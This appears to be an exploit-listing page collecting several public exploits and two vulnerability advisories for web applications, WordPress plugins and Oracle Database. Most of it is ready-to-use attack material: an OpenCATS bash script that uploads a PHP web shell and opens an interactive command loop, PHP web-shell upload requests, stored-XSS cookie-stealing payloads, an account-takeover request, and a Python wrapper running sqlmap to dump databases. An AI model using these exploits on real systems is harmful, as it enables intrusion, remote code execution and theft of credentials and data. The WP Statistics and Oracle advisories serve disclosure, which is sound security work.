Latest exploits :: CodePwn

<pre><code># Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated) # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux Home Owners Collection Management System is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters #Steps to Reproduce 1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters. 2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password ============================================== POST /hocms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391 Content-Length: 899 Origin: http://localhost Connection: close Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="id" -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="firstname" hi -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="lastname" test -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="username" saud -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="password" saud -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="type" 1 -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------8012296389370411172619882391-- </code></pre>

<pre><code># Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE) # Google Dork: intext:"Current Available Openings, Recently Posted Jobs" # Date: 21/09/2021 # Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar # Vendor Homepage: https://www.opencats.org/ # Software Link: https://github.com/opencats/OpenCATS # Version: <=0.9.4 Countach # Tested on: Debian, CentOS, Windows Server #!/bin/bash if [ $# -eq 0 ] then echo "Usage: $0 <target URL>" exit fi # if a payload doesn't work, try another payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>' #payload='GIF87a<?php echo `$_REQUEST[0]`; ?>' #payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>' target=$1 green="\033[0;32m" red="\033[0;31m" reset="\033[0m" #====================== Functions rev() { while true do echo -n -e "\n$ " read cmd curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d" done } upload() { curl -skL $1/$2 \ -H "Connection: close" \ -F resumeFile=@"$3;type=application/x-php" \ -F ID="$firstJb" \ -F candidateID="-1" \ -F applyToJobSubAction="resumeLoad" \ --compressed \ --insecure } getVersion() { ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"` if [ -z "${ver}" ] then ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"` if [ -z "${ver}" ] then echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}" return 0 fi fi echo -e "${green}[*] Version detected: $ver${reset}" } writePayload(){ tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php" file=`basename $tmpfile` echo "$1" > $tmpfile } banner(){ echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d echo -e "\n" } #====================== banner echo "[*] Attacking target $target" echo "[*] Checking CATS version..." getVersion $target #exit echo "[*] Creating temp file with payload..." writePayload "$payload" #exit echo "[*] Checking active jobs..." jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'` numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'` firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'` if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] No active jobs found.${reset}" echo "[*] Trying another path..." jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'` numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'` if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] Couldn't find any active job.${reset}" exit fi fi firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'` echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}" echo "[*] Sending payload..." req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"` if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"` then echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}" echo "[*] Checking by another method..." sed -i "s/GIF87a//" $tmpfile req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"` if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"` then echo -e "${red}[-] Couldn't upload payload...${reset}" exit fi fi echo -e "${green}[+] Payload $file uploaded!" echo "[*] Deleting created temp file..." rm $tmpfile echo "[*] Checking shell..." check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file") if `echo $check | grep -q "0x7359"` then echo -e "${green}[+] Got shell! :D${reset}" curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d" rev $target/upload/careerportaladd/$file else echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}" fi </code></pre>

<pre><code>On February 7, 2022, Security Researcher Cyku Hong from DEVCORE reported a vulnerability to us that they discovered in WP Statistics, a WordPress plugin installed on over 600,000 sites. This vulnerability made it possible for unauthenticated attackers to execute arbitrary SQL queries by appending them to an existing SQL query. This could be used to extract sensitive information like password hashes and secret keys from the database. On request, we assigned them the vulnerability identifier: CVE-2022-0513. Even though Wordfence provides protection against this vulnerability, we strongly recommend ensuring that your site has been updated to the latest patched version of “WP Statistics,” which is version 13.1.5 at the time of this publication. Description: Unauthenticated Blind SQL Injection Affected Plugin: WP Statistics Plugin Slug: wp-statistics Plugin Developer: VeronaLabs Affected Versions: <= 13.1.4 CVE ID: CVE-2022-0513 CVSS Score: 9.8 (Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Researcher/s: Cyku Hong from DEVCORE Fully Patched Version: 13.1.5 WP Statistics is a WordPress plugin designed to provide a centralized hub for all of a WordPress site’s statistics, such as visitor data, and it emphasizes storing this data locally to the WordPress site to preserve user privacy. As such, it is reasonable to expect that the plugin would implement a lot of functionality to store and retrieve information from the database through the use of SQL queries. Unfortunately, the implementation of one of these queries was insecure, creating a SQL Injection vulnerability. When the “Record Exclusions'' feature was enabled, this vulnerability became exploitable. The “Record Exclusions” feature is designed to record when a visit, or a “hit”, is excluded from the site’s statistics, such as visits by users with specific roles, login page access, and anything else that a site owner may have explicitly selected to exclude. It records that data to a separate database table so as not to contaminate the main statistical data the plugin collects. In order to record these hits when a caching plugin was enabled, the plugin registered a REST route /wp-json/wp-statistics/v2/hit that would call the hit_callback() function. This function would then call the record() function from the ‘Hits’ class which checks to see if the request should be excluded and determines what exclusion the request correlates to, prior to calling the next appropriate record() function. public static function record() { # Check Exclusion This Hits $exclusion = Exclusion::check(); # Record Hits Exclusion if ($exclusion['exclusion_match'] === true) { Exclusion::record($exclusion); } # Record User Visits if (Visit::active() and $exclusion['exclusion_match'] === false) { Visit::record(); } # Record Visitor Detail if (Visitor::active()) { $visitor_id = Visitor::record($exclusion); } When the exclusion_match parameter is set to true in a request, the data is then passed to the record() function from the ‘Exclusion’ class where the plugin attempts to update the count of an exclusion reason for the day if it is present in the database. If the exclusion reason isn’t present in the database for the current date the initial query will return false and trigger the next query to add a new record count to the table for the reason. public static function record($exclusion = array()) { global $wpdb; // If we're not storing exclusions, just return. if (self::record_active() != true) { return; } // Check Exist this Exclusion in this day $result = $wpdb->query("UPDATE " . DB::table('exclusions') . " SET `count` = `count` + 1 WHERE `date` = '" . TimeZone::getCurrentDate('Y-m-d') . "' AND `reason` = '{$exclusion['exclusion_reason']}'"); if (!$result) { $insert = $wpdb->insert( DB::table('exclusions'), array( 'date' => TimeZone::getCurrentDate('Y-m-d'), 'reason' => $exclusion['exclusion_reason'], 'count' => 1, ) ); if (!$insert) { if (!empty($wpdb->last_error)) { \WP_Statistics::log($wpdb->last_error); } } The $wpdb->query() function was used for the initial UPDATE query and used the user-supplied 'exclusion_reason' value as part of the query. Due to the fact that there was no escaping on the user supplied value, or parameterization on the query, attackers could easily append additional SQL queries to the existing query via the 'exclusion_reason' and extract sensitive information from the database. Since no data from the SQL query was returned in the response, and the response did not indicate a boolean answer, an attacker would need to use a Time-Based blind approach to extract information from the database. This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database. This is an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities. Upon further analysis, we uncovered that a user could also simply pass the exclusion_match parameter equal to yes, the exclusion_reason parameter set to the SQLi payload, and the wp_statistics_hit_rest parameter set to true, along with passing the string wp-json/ in the request URI to trigger the same record() function from the ‘Exclusions’ class. This method did not require a caching plugin to be enabled to obtain a valid nonce to trigger the REST endpoint. This is due to the is_rest_request() function returning true when the $_SERVER['REQUEST_URI'] contains the REST prefix, wp-json/, even if the request isn’t a genuine REST request. This ultimately triggers the entire record process. Conclusion In today’s post, we detailed a flaw in the “WP Statistics” plugin that made it possible for unauthenticated attackers to inject arbitrary SQL queries to steal sensitive information from a database. This flaw has been fully patched in version 13.1.5. We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 13.1.5 at the time of this publication. All Wordfence users, including Free are protected from exploits targeting this vulnerability thanks to the Wordfence Firewall’s built-in SQL Injection protection. If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected as this is a serious vulnerability that can lead to complete site takeover. Congratulations to Cyku Hong from DEVCORE for discovering and responsibly disclosing this vulnerability to the plugin’s developers. </code></pre>

<pre><code># Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: fuzzyap1 # Date: 7-12-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip # Version: 1.0 # Tested on: windows # Vulnerable page: http://localhost/admin/enquiry_category # Vulnerable Parameters: "category" Technical description: A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/admin/enquiry_category 2) Insert your payload in the "category" parameter 3) Click "save" Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(document.cookie)> --- POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------151631281127875309002088019539 Content-Length: 490 Origin: http://localhost Connection: close Referer: http://localhost/admin/enquiry_category Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63; ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0 Upgrade-Insecure-Requests: 1 -----------------------------151631281127875309002088019539 Content-Disposition: form-data; name="category" This is for ID 3 informa222tion"><img src=# onerror=alert(document.cookie)> -----------------------------151631281127875309002088019539 Content-Disposition: form-data; name="purpose" Payment -----------------------------151631281127875309002088019539 Content-Disposition: form-data; name="whom" Tutorial -----------------------------151631281127875309002088019539-- --- Steps to exploit: 1) Navigate to http://localhost/admin/manage_profile 2) Insert your payload in the "anme" parameter 3) Click "save" Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert('xss')> --- POST /admin/manage_profile/update HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------13285163425854907563979323722 Content-Length: 519 Origin: http://localhost Connection: close Referer: http://localhost/admin/manage_profile Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16 Upgrade-Insecure-Requests: 1 -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="name" Administrator"><img src=# onerror=alert(document.cookie)> -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="email" admin@admin.com -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="userfile"; filename="" Content-Type: application/octet-stream -----------------------------13285163425854907563979323722-- --- </code></pre>

<pre><code># Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE) # Exploit Author: fuuzap1 # Date: 7-12-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip # Version: 1.0 # Tested on: windows # Vulnerable page: http://localhost/admin/examQuestion Technical description: A unrestricted file upload vulnerability exists in the Free school management software v1.0. An attacker can leverage this vulnerability in order to get a remote code execution on the affected web server. Once a php webshell containing "<?php system($_GET["cmd"]); ?>" gets uploaded it is getting save into /uploads/exam_question/ directory, and is accessible by all users. the attacker can gain remote code execution on the web server. Steps to exploit: 1) Navigate to http://localhost/admin/manage_profile 2) click "ADD NEW QUESTION PAPER" edit base infomation 3) uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" in the Field "upload Drag and drop a file here or click" 3) Click "save" 4) open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then php code execution Proof of concept (Poc): The following payload will allow you to run the javascript - <?php system($_GET["cmd"]); ?> --- POST /admin/examQuestion/create HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------183813756938980137172117669544 Content-Length: 1331 Origin: http://localhost Connection: close Referer: http://localhost/admin/examQuestion Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q Upgrade-Insecure-Requests: 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="name" test4 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="class_id" 2 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="subject_id" 5 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="timestamp" 2021-12-08 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="teacher_id" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="file_type" txt -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="status" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="description" 123123 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="_wysihtml5_mode" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="file_name"; filename="cmd.php" Content-Type: application/octet-stream <?php eval($_GET["cmd"]); ?> -----------------------------183813756938980137172117669544-- --- </code></pre>

<pre><code># Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) # Date 08.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://ays-pro.com/ # Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip # Version: < 2.8.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24931 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md ''' Description: The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection. ''' banner = ''' .--. .-..-. .--. .---. .--. .---. ,-. .---. .-. .--. .----. ,-. : .--': :: :: .--' `--. :: ,. :`--. :.' : `--. : .'.': .; :`-- ;.' : : : : :: :: `; _____ ,',': :: : ,',' `: : _____ ,','.'.'_`._, : .' ' `: : : :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ ` : : : _`,`. : : `.__.' `.,' `.__.' :____;`.__.':____; :_; :____; :_: :_:`.__.' :_; [+] Copy Content Protection and Content Locking - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH # Exploit: print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) </code></pre>

<pre><code>Advisory ID: SYSS-2021-062 Product: Database Manufacturer: Oracle Affected Version(s): 12.1.0.2, 12.2.0.1, 19c Tested Version(s): 18c Vulnerability Type: Inadequate Encryption Strength (CWE-326) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2021-03-17 Solution Date: 2021-08-07 Public Disclosure: 2021-12-10 CVE Reference: CVE-2021-2351 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Oracle Database is a general purpose relational database management system (RDMBS). The manufacturer describes the product as follows (see [1]): "Oracle database products offer customers cost-optimized and high-performance versions of Oracle Database, the world's leading converged, multi-model database management system, as well as in-memory, NoSQL and MySQL databases. Oracle Autonomous Database, available on premises via Oracle Cloud@Customer or in the Oracle Cloud Infrastructure, enables customers to simplify relational database environments and reduce management workloads." To protect the client/server communication, a proprietary security protocol "Native Network Encryption" (NNE) is used. A TLS-based alternative can optionally be configured. NNE's integrity protection mechanism deliberately weakens the key used for computing per-packet message authentication codes (MACs). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When analyzing the protocol details, SySS found out that depending on the selected hash algorithms, one of two key generation schemes is used. Both are seeded with material from the established session key. However, even for the AES-based key generator, which is used when modern cryptographic primitives are selected, the session key is truncated to 40 bits. For more details on the protocol and MAC computation, refer to our paper [4]. Brute-force cracking of that key, for example if only integrity but no encryption is enabled, is likely possible and allows malicious manipulation of transmitted database commands or data. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The initialization of the key generator, as originally implemented, can be described with the following Python code, where SK is the established session key, and the initialization vector (IV) was exchanged in clear text during NNE negotiation. mk = SK[0:5] + b'\xFF' + b'\x00' * 10 self.m = AES.new(mk, AES.MODE_CBC, iv=IV[0:16]) self.ms = b'\x00'*32 self.ms = s = self.m.encrypt(self.ms) self.m = AES.new(s[0:16], AES.MODE_CBC, iv=s[16:32]) k1 = s[0:5] + b'\xB4' + s[6:16] self.s2c = AES.new(k1, AES.MODE_CBC, iv=s[16:32]) self.s2cs = b'\x00' * 32 k2 = s[0:5] + b'\x5A' + s[6:16] self.c2s = AES.new(k2, AES.MODE_CBC, iv=s[16:32]) self.c2ss = b'\x00' * 32 A per-packet key "k" is then generated like self.c2ss = k = self.c2s.encrypt(self.c2ss) and appended to the packet data as well as hashed using the selected hash algorithm. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the Oracle Database servers and clients to the patched versions. Enforce usage of a secured protocol version by setting the following options: SQLNET.ALLOW_WEAK_CRYPTO_CLIENTS=FALSE (server-side) SQLNET.ALLOW_WEAK_CRYPTO=FALSE (client-side) Or use TLS-based transport security instead of Native Network Encryption. More information: https://www.oracle.com/security-alerts/cpujul2021.html https://support.oracle.com/rs?type=doc&id=2791571.1 (customer account required) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2013-03-02: Vulnerability discovered 2021-03-17: Vulnerability reported to manufacturer 2021-07-20: Initial patch release by manufacturer, 2021-08-07: Final patches released by manufacturer 2021-12-10: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Oracle Database https://www.oracle.com/database/ [2] SySS Security Advisory SYSS-2021-062 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-062.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Paper "Oracle Native Network Encryption" https://www.syss.de/fileadmin/dokumente/Publikationen/2021/2021_Oracle_NNE.pdf ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>